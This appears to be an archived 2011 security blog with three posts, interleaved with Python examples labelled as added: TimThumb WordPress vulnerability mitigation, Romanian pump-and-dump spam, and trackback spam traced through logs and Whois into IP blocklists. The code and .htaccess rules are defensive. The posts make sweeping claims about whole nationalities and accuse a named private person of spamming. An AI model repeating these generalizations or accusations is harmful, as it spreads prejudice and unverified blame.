First of all, you must be running the most current version of WordPress, which at this writing is v 3.2.1, preferably, with only themes approved and delivered through the WordPress website. This will protect the WordPress software itself, until a new vulnerability is discovered and published by hacker groups. Always get on the WordPress mailing list so you are notified when new versions are released. I recommend you bookmark and read this page often: http://wordpress.org/news/category/security/

You still need to check any theme directories (aka Folders) for the presence of the currently exploited file. If you are using an older version of WordPress, you had better upgrade first, at http://wordpress.org/.

The file currently being exploited by remote scanning scripts is named TimThumb.php. This file is used to resize images that are allowed to be uploaded to photo galleries. TimThumb is "inherently insecure" because it writes files into a temporary cache directory when it fetches an image and resizes it. But that directory, which is a sub-directory of your main WordPress directory, is accessible to people visiting the website. An attacker can compromise the site by figuring out how to get TimThumb to grab a malicious PHP file and put it in the WordPress directory. The code will be executed if an attacker then accesses the file using a Web browser.

Okay already. What can the average Joe or Jill do to protect his/her website? First of all, you need to scan your WordPress blog to see if it is already compromised with injected scripts. If so, change your admin password for WordPress, then hunt down all instances of TimThumb.php. If the script version on your server is older than version 2.0, you should immediately either disable those themes, or edit the TimThumb.php files and change the "$allowedSites" array to an empty array (the default file has an array with 3 to 7 popular websites allowed to upload files to it). This disallows any external site or visitor from using this plug-in to resize images (or exploit your blog by spoofing an approved website). However, you will still be able to resize images you yourself upload.

It has been suggested that renaming all instances of the file named timthumb.php to another, not-easily-guessed name, then changing that name in all of the other PHP files that call upon it, will prevent automated file vulnerability scanners from knowing you are using that exploitable plug-in. It hides it, but doesn't fix the problem. Only a new, secure version of the TimThumb file will plug the vulnerabilities being exploited right now.
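Here is the hunt-and-check step from above written out as a small script. This is an added Python example, not code from this blog or from the TimThumb project: it walks a WordPress tree looking for timthumb.php and thumb.php, reads each copy's version and its $allowedSites list, flags copies older than 2.0 or still allowing remote sites, and can rewrite the array to empty, which is the edit recommended above. It assumes the file declares its version as define('VERSION', '...') and its allow-list as $allowedSites = array(...); the sample file contents and the directory layout in demo() are constructed.

```python
import re
import tempfile
from pathlib import Path

# Constructed stand-ins for the top of a timthumb.php file (not real TimThumb code).
# Assumption: version declared via define('VERSION', ...), allow-list via $allowedSites.
SAMPLE_OLD = """<?php
define ('VERSION', '1.33');
$allowedSites = array('flickr.com', 'picasa.com', 'blogger.com', 'wordpress.com');
"""
SAMPLE_FIXED = """<?php
define ('VERSION', '2.0');
$allowedSites = array();
"""

SCRIPT_NAMES = {"timthumb.php", "thumb.php"}
VERSION_RE = re.compile(r"""define\s*\(\s*['"]VERSION['"]\s*,\s*['"]([^'"]+)['"]\s*\)""")
ALLOWED_RE = re.compile(r"\$allowedSites\s*=\s*array\s*\((.*?)\)\s*;", re.DOTALL)
QUOTED_RE = re.compile(r"""['"]([^'"]*)['"]""")


def parse_timthumb(text):
    """Pull the declared version and the remote allow-list out of a TimThumb source file."""
    m = VERSION_RE.search(text)
    a = ALLOWED_RE.search(text)
    return {
        "version": m.group(1) if m else None,
        "allowed_sites": QUOTED_RE.findall(a.group(1)) if a else [],
    }


def version_tuple(version):
    """'1.33' -> (1, 33) so versions compare numerically rather than as strings."""
    parts = []
    for piece in version.split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group()) if digits else 0)
    return tuple(parts)


def assess(info):
    """Return the findings for one copy of the script (empty list means nothing to do)."""
    findings = []
    if info["version"] is None or version_tuple(info["version"]) < (2, 0):
        findings.append("version %s is older than 2.0: disable the theme or update the script"
                        % (info["version"] or "unknown"))
    if info["allowed_sites"]:
        findings.append("remote fetching still allowed from: " + ", ".join(info["allowed_sites"]))
    return findings


def empty_allowed_sites(text):
    """Apply the mitigation from the post: replace the allow-list with an empty array."""
    return ALLOWED_RE.sub("$allowedSites = array();", text, count=1)


def scan_tree(root):
    """Find every timthumb.php / thumb.php below root and assess each one."""
    results = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.name.lower() in SCRIPT_NAMES:
            info = parse_timthumb(path.read_text(encoding="utf-8", errors="replace"))
            results.append((str(path), info, assess(info)))
    return sorted(results)


def demo():
    """Build a throw-away WordPress-like tree holding both samples and scan it."""
    with tempfile.TemporaryDirectory() as root:
        theme = Path(root, "wp-content", "themes", "gallery")
        (theme / "scripts").mkdir(parents=True)
        (theme / "timthumb.php").write_text(SAMPLE_OLD)
        (theme / "scripts" / "thumb.php").write_text(SAMPLE_FIXED)
        return {Path(p).name: findings for p, _info, findings in scan_tree(root)}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", findings or "OK")
```

Run it against your real document root by calling scan_tree("/path/to/wordpress") instead of demo(); any copy that comes back with findings is one to disable, update, or rewrite with empty_allowed_sites() before uploading it back.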

Read this blog for background information, including details about determining if and how many instances of TimThumb exist on your website and whether or not it has been compromised already. But, do so using Firefox, with the NoScript Add-on enabled, for your own safety. Then go to the Tim Thumb Project page on Google Code pages and download the latest patched version (the link next to "Grab the code from here"). If you click on the "Updates" link you will see a lot of activity right now, as the author and his team hash out the security issues they are discovering in this program. It may be a good idea to disable all existing image resize scripts for your blog, if they use TimThumb, or Thumb.php, until the dust settles.

Note, that the TimThumb team is frantically testing and rewriting the script, up to the moment before I published this article. See the latest build here.

I have learned about another tactic that will at least protect the folder which TimThumb is currently (has been) using to store its temporary cache files. This is the folder into which exploit scripts are currently being uploaded from evil sources. The fix involves both renaming all instances and references to the actual file (timthumb.php) and creating a .htaccess file and placing it into that specific directory, on your website's server.

.htaccess directives to restrict execution of temporary scripts in the cache directory (comments added; lines beginning with # are ignored by Apache):

# No RewriteRule lines follow, so this line has no effect here, but it is harmless.
RewriteEngine On

# Refuse every direct HTTP request for files in this directory, so a script dropped
# into the cache cannot be reached by a browser at all.
Order Deny,Allow
Deny From All

# Belt and braces: hand script extensions to the CGI handler while CGI execution is
# switched off, so even if the deny rule is bypassed the server refuses to run them.
Options -ExecCGI
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi

Sucuri WordPress Check
Sucuri has released a special PHP script that will scan your WordPress installation to find any and all instances of the TimThumb.php script. You can use the results to either rename the files, or modify them to remove the allowed domains array. Follow the instructions on the aforementioned page to rename, upload and use their script.

This is a big problem that will have a lot of people pulling out their hair, until the dust settles on this case. I want you all to be aware that if you, as a website owner, or acting Webmaster, have installed WordPress, and/or installed an insecure theme, or plug-in for it, you are responsible for updating and fixing it. Your web host is not going to update or secure these programs for you. Sorry, but that is a fact. If you install it, you are responsible for it. If you fail to fix an exploit that is happening on your website, you may find your service terminated until you do fix it. You can bet they won't refund any money you might think you have coming from early termination. Allowing your website to harm other websites, or visitors to your website, is a violation of the standard web hosting terms of service, used by virtually every web host in good standing.


New pump and dump stock spam comes from Romania

Since June 22, 2011, I have written 6 articles highlighting Romania as a source of spam attacks and hosting of spamvertised domains. This is my 7th article in 6 weeks, exposing badness coming from Romania, targeting North Americans.

Tonight, while minding my own business, I received an email from an outfit called OTC Pundit (dot com). The subject was: "Food is the New Oil" and the body had little text, but did have a link to an image file. The link was instantly suspicious to me, because it was a numeric link, rather than a named domain. Knowing that this was spam, I exposed the source code in MailWasher Pro. The HTML content revealed that this spam was supposed to look like a newsletter of sorts.

The Received From line showed that the email came from the IP address: 89.238.231.135. It contained a link to a file and that link also contained the same IP address. I traced the link with my diagnostic tools and it turns out that 89.238.231.135 belongs to a Romanian web host: EUROWEB Romania, whose entire CIDR is 89.238.192.0/18. That CIDR is already on my Russian Blocklist. I then went back to the source code of the spam message and copied the link, which was to a .jpg image file. I looked over the source code of that link, using WannaBrowser and found that no exploits were attached to it. So, I dropped the URL into my Firefox browser, using the NoScript Add-on for safety.

The image turned out to be a whole page ad for an upcoming pump and dump stock scam. It uses the words Food Is The Next Oil and speaks about food shortages and how investors can profit from other people's misfortune and famines. This is truly a slimeball spam campaign!

The IP address I listed is the IP of a website registered in Romania: otcpundit dot com. It uses rohost.com name servers, as well as those of a marketing company that is on the same Romanian server. The domain was registered on Feb 2, 2011.

I have taken the following steps to protect my friends from falling for any scams coming from that company: The domain OTC Pundit has been added to the Known Spam Domains filters for MailWasher Pro and the CIDR 89.238.192.0/18 can be added to your email server firewall, if you have root access to administer Linux firewall rules. If you are on shared web hosting you can see if you are able to create a rule to re-route email containing "otcpundit.com" in the entire header, to NULL. If you are not receiving email via your own domain, but through a third party email system, via your browser, you are at their mercy to filter email for you. If you get your email via a POP3 desktop program, like Windows Live Mail, you can use MailWasher Pro, with my custom filters, to filter out spam before it gets downloaded to your email client.

Bottom line: Delete all email messages coming from any variation of OTC Pundit, or Emp-Marketing, or anything with words similar to Food is the Next Oil in the subject or body text. These are pump and dump penny stock scams in the making. Also, 99.99999999% of email that contains a numeric IP address, rather than a domain name and extension, is a link to fraud, or malware. An example of such a URL is: http://123.456.789.0/otherwords-or-characters. Delete all numeric IP link emails on sight. I have a filter for MailWasher Pro that detects numeric IPs in links.
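To show what such a filter actually checks, here is the same three-part test (known spam domain in the sender, pump-and-dump phrase in the subject, numeric IP host in any link) as an added Python example. This is not MailWasher Pro's own filter code. The sample message is constructed to resemble the spam described above: the domain and IP address are the ones named in this article, but the sender mailbox, the image path and the body copy are made up.

```python
import email
import re
from urllib.parse import urlparse

# Constructed sample modelled on the spam described above (sender mailbox, path and
# body text are invented; the domain and IP are the ones named in the post).
SAMPLE_SPAM = """From: OTC Pundit <newsletter@otcpundit.com>
To: victim@example.invalid
Subject: Food is the New Oil
Content-Type: text/html

<html><body><p>Read this week's issue:</p>
<a href="http://89.238.231.135/otc/issue.jpg"><img src="http://89.238.231.135/otc/issue.jpg"></a>
</body></html>
"""

# Constructed benign message for comparison.
SAMPLE_CLEAN = """From: Newsletter <news@example.com>
To: victim@example.invalid
Subject: Monthly update
Content-Type: text/plain

Read our update at http://www.example.com/news/august
"""

KNOWN_SPAM_DOMAINS = {"otcpundit.com"}
PUMP_AND_DUMP_PHRASES = ("food is the next oil", "food is the new oil")

URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.IGNORECASE)
# A host that is only digits and dots, e.g. 89.238.231.135 or the post's 123.456.789.0.
# Deliberately a pattern match rather than strict address validation: a spam filter
# should flag anything that merely looks like a dotted quad.
DOTTED_QUAD_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def extract_urls(text):
    """All http(s) links in a message body, in order of appearance (duplicates kept)."""
    return URL_RE.findall(text)


def is_numeric_ip_host(url):
    """True when the link's host part is a bare numeric IP instead of a domain name."""
    host = urlparse(url).hostname or ""
    return bool(DOTTED_QUAD_RE.match(host))


def sender_domain(from_header):
    """Domain part of the From: header, lower-cased; '' if none is present."""
    m = re.search(r"@([\w.-]+)", from_header or "")
    return m.group(1).lower() if m else ""


def classify_message(raw_message):
    """Return the list of reasons to delete the message; an empty list means it passed."""
    msg = email.message_from_string(raw_message)
    reasons = []
    domain = sender_domain(msg["From"])
    if domain in KNOWN_SPAM_DOMAINS:
        reasons.append("sender domain on known-spam list: " + domain)
    subject = (msg["Subject"] or "").lower()
    if any(phrase in subject for phrase in PUMP_AND_DUMP_PHRASES):
        reasons.append("pump-and-dump phrase in subject: " + msg["Subject"])
    body = "" if msg.is_multipart() else msg.get_payload()
    for url in sorted({u for u in extract_urls(body) if is_numeric_ip_host(u)}):
        reasons.append("link to numeric IP host: " + url)
    return reasons


if __name__ == "__main__":
    for label, raw in (("spam", SAMPLE_SPAM), ("clean", SAMPLE_CLEAN)):
        print(label, "->", classify_message(raw) or "no findings")
```

The numeric-IP rule is the one that fires most reliably on this kind of spam; the domain and phrase rules are the parts you would keep updating as the sender rotates names.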

In this case of image spam, the link ended with .jpg, an image type. However, one cannot assume that the server at the other end will actually deliver an image. It could have been configured to serve an executable exploit instead of an image. Learn how to walk safely through mine fields before you play in them. Browse using Firefox, with the NoScript Add-on enabled. Use WannaBrowser or another text-only browser to look at the source code of web pages before attempting to load those pages or image files. WannaBrowser will reveal the IP address of any website it can display in the Source field. You can copy that IP address and paste it into the IP Whois field in Domain Tools, or one of my favorites, CQCounter, or any other Whois look-up site. This reveals where it is hosted, when it was registered, and who is the official domain Registrar.

In the 15th Century, the Romanians gave us the legend of Count Dracula, a.k.a: Vlad Dracula. He sucked the life blood out of his unfortunate victims. Modern day Draculas suck the life savings out of their online victims, by means of spam and scams for useless products and offerings, scripted browser exploits and money laundering schemes.

Stay thirsty my friend! But, avoid the modern day Count Draculas; the money sucking vampires.


August 1, 2011

Evidence linking Romanian spammers to Ubiquity Servers

On July 27, 2011, I published a blog article about blog spam scripts running on Ubiquity Servers. For several days those POST attempts from Ubiquity IP space disappeared. They returned today, leading me to a most interesting discovery about the source.

Let me show you how I find information about access log spam attempts and deal with them.

In today's first blog spam attempt, an unknown visitor, with the IP address 108.62.150.52, attempted to POST a trackback comment to my Movable Type blog. If the POST was made by a real person, and if that person understood and read the English language, he or she would have read the bold notice that my blog does not accept either comments or trackbacks.

Of course, if the POST was made by a script, it would neither see that notice, nor care about it. Similarly, if the POST was being attempted by somebody in a very foreign country, in say Romania, they would not understand the text in notices I post on every page, regarding no trackbacks allowed. And from where did this POST originate? Romania!

Here then, without any ado, is the chain of evidence linking a blog spam attempt to Romania, from whence a huge amount of spam and online exploits have been traced.

108.62.150.52 - - [01/Aug/2011:12:15:40 -0600] "POST /cgi-bin/mt/mt-tb.cgi/18/trackback HTTP/1.0" 403 537 "" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"

Reverse IP: 108.62.150.52.rdns.ubiquityservers.com
network:Network-Name: Secondary Assignment - Ticket ID JCE-507-49771
network:IP-Network: 108.62.150.0/24
network:IP-Network-Block: 108.62.150.0 - 108.62.150.255
network:Org-Name: Boboc, Alexandru
network:Street-Address: Calea Victoriei 91-93
network:City: Bucharest
network:State: RO
network:Postal-Code: 10012
network:Country-Code: RO
network: Tech-Contact:MAINT-26532.108.62.150.0/24
contact:Abuse-Name: Nobis Network Abuse Team
contact:Abuse-Email: [email protected]

First of all, the blog article they attempted to spam (#18) is dated April 28, 2006. It is now August 1, 2011: five and a quarter years from when that article was posted by me (and never updated). Since then I have posted hundreds of newer articles. Only a spammer tries to post comments and trackbacks in such out-of-date articles. It is one way they use to sneak spam links into blogs, hoping that the person who started that blog won't notice. This time, the spammer is using a server assigned to one Alexandru Boboc, who runs a web hosting business in Romania. They have 255 IP addresses assigned to this CIDR (Classless Inter-Domain Routing; a range of consecutive IP addresses) and I have added all of them to my Russian Blocklist, thusly:

<Files *>
order deny,allow
deny from 108.62.150.0/24
</Files>

If you have websites hosted on Apache web servers, with shared hosting, you can block tons of badness from accessing your pages and scripts, by adding my Russian Blocklist to your .htaccess file. If you have root privileges to a Linux based web server, you can import my iptables Russian Blocklist into your Linux Firewall. People in this category would lease VPS, or dedicated servers, or would be server administrators.

How did I find all of this out? First of all, I read my raw access logs for my primary website. Using the Search function in my browser (Ctrl + F), I look for any entries beginning with this: "POST". Then, if the POST was made to my blog, and not my official contact form, by anybody other than me (I know my home IP address), I immediately trace the IP address by means of a Whois look-up. I use two websites to do these look-ups: http://cqcounter.com/whois/ - and - http://www.domaintools.com. Both are free, but supported by either advertisements or memberships. No problem: my websites are also supported by advertising, or donations from grateful users.
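The same triage can be scripted instead of done with Ctrl + F. What follows is an added Python example, not this blog's own tooling: it parses combined-format Apache log lines, keeps only POSTs to the Movable Type trackback script that did not come from the webmaster's own address, pulls out which (old) entry number was targeted, checks each source IP against the blocklist ranges named in these articles, reports addresses not yet covered, and emits the same .htaccess deny block shown above plus equivalent iptables lines. The first log line is the one quoted in this article; the other three, the "own" address and the contact-form path are constructed using documentation IP ranges. The Whois step still has to be done by hand (or with your own look-up tool).

```python
import ipaddress
import re

# Combined-format Apache access log entries: the first is the line quoted in the post,
# the other three are constructed (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '108.62.150.52 - - [01/Aug/2011:12:15:40 -0600] "POST /cgi-bin/mt/mt-tb.cgi/18/trackback HTTP/1.0" 403 537 "" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"',
    '192.0.2.10 - - [01/Aug/2011:09:02:11 -0600] "POST /cgi-bin/contact.cgi HTTP/1.1" 200 1520 "http://www.example.com/contact.html" "Mozilla/5.0 (constructed)"',
    '198.51.100.7 - - [01/Aug/2011:10:45:03 -0600] "GET /blog/ HTTP/1.1" 200 8832 "" "Mozilla/5.0 (constructed)"',
    '203.0.113.9 - - [01/Aug/2011:13:01:55 -0600] "POST /cgi-bin/mt/mt-tb.cgi/42/trackback HTTP/1.0" 403 537 "" "Mozilla/5.0 (constructed)"',
]

OWN_IPS = {"192.0.2.10"}                              # the webmaster's own address (constructed)
BLOCKLIST = ["108.62.150.0/24", "89.238.192.0/18"]    # ranges named in these articles
TRACKBACK_PREFIX = "/cgi-bin/mt/mt-tb.cgi"            # Movable Type trackback script, as in the log

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_log_line(line):
    """Fields of one combined-format line as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def suspicious_posts(lines, own_ips, path_prefix=TRACKBACK_PREFIX):
    """POSTs aimed at the trackback script from anyone other than the site owner."""
    hits = []
    for line in lines:
        e = parse_log_line(line)
        if e and e["method"] == "POST" and e["path"].startswith(path_prefix) and e["ip"] not in own_ips:
            hits.append(e)
    return hits


def trackback_entry_id(path):
    """Entry number targeted by a trackback POST (18 in the quoted line), or None."""
    m = re.search(r"/mt-tb\.cgi/(\d+)/trackback", path)
    return int(m.group(1)) if m else None


def in_blocklist(ip, cidrs):
    """True if ip falls inside any of the CIDR ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(c, strict=False) for c in cidrs)


def new_block_candidates(hits, cidrs):
    """Source addresses of suspicious POSTs that no existing range already covers."""
    return sorted({h["ip"] for h in hits if not in_blocklist(h["ip"], cidrs)})


def htaccess_deny_block(cidrs):
    """The .htaccess form used above, one deny line per range."""
    lines = ["<Files *>", "order deny,allow"] + ["deny from %s" % c for c in cidrs] + ["</Files>"]
    return "\n".join(lines)


def iptables_rules(cidrs):
    """Equivalent drop rules for those with root on their own Linux server."""
    return ["iptables -A INPUT -s %s -j DROP" % c for c in cidrs]


if __name__ == "__main__":
    hits = suspicious_posts(SAMPLE_LOG, OWN_IPS)
    for h in hits:
        state = "already blocked" if in_blocklist(h["ip"], BLOCKLIST) else "not yet blocked"
        print("%s -> entry %s, status %d (%s)" % (h["ip"], trackback_entry_id(h["path"]), h["status"], state))
    print("look up with Whois and consider adding:", new_block_candidates(hits, BLOCKLIST))
    print(htaccess_deny_block(BLOCKLIST))
    print("\n".join(iptables_rules(BLOCKLIST)))
```

Feed it your real access log with suspicious_posts(open("access.log").read().splitlines(), {"your.home.ip"}); the addresses it lists as not yet blocked are the ones to run through the Whois look-ups described above before deciding which range to add.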

A "Whois" look-up will reveal much about the owner of an IP address. Just look at the Whois info listed a few paragraphs above, where we found out that the offending IP belonging to UbiquityServers.com was assigned to a Romanian business. That information was just a tiny excerpt from what was revealed on Domain Tools.

It would appear that Ubiquity Server Solutions, Nobis Tech have some cleaning up to do. Server leasing companies should not turn a blind eye to their customers and hope that they will do nothing unlawful, or against the terms of service. They need to take a closer look at what is going on inside 108.62.150.0/24 - especially from 108.62.150.52. If one Googles the phrase "boboc alexandru spam" one of the results is a forum for tracking Dedicated spam servers running from ubiquityservers.com/nobistech.net. If you go to that page you will see not just UbiquityServers.com, but also IP ranges reassigned to "Boboc, Alexandru." His name appears 21 times, between page 7 and page 8 on that website. This person, whether his name is real or an alias, is himself a spammer. He is leasing out his dedicated servers to other spammers, in Romania and Russia. This is a Romanian Spam Gang.

Interesting note: Googling the phrase "ubiquity servers spam" produces 518,000 results! Webmasters around the World are blocking their entire IP space. I am one of those webmasters. Because my website is on a shared server, I must use the .htaccess method. This results in a Server 403 response to any contact coming from any IP within the Russian (and Romanian) blocklist. Those running or managing their own servers can block them at the firewall and nobody coming from that IP space will even see that a website exists when they try to POST or view spam comments or trackbacks.

In my case, because I do not allow trackbacks (for the very reason that when I did they were ALL SPAM LINKS), I am unable to see the destination URLs being spammed, but I am fairly certain they aren't dropping by a 5+ year old article just to say hello! If I were able to decipher them I would report them to the web hosts and domain Registrars from whom they received their Internet connections. This usually results in termination of those accounts within hours or days. Thus, they created a little work for me, which happily resulted in this article and a new addition to the ever-increasing Russian Blocklist.

That blocklist, in both htaccess and iptables formats, includes numerous other Countries that used to make up the USSR. It is unbelievable how much spam, hacking, exploiting, identity theft and other badness emanates from the former member States of the Soviet Union. Just search this blog for the keywords Russian and Romanian and you will see lots of articles revealing the badness coming from those sources.


About the author
Wiz FeinbergWiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security. Wizcrafts Computer Services was established in 1996.
Creative Commons License This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.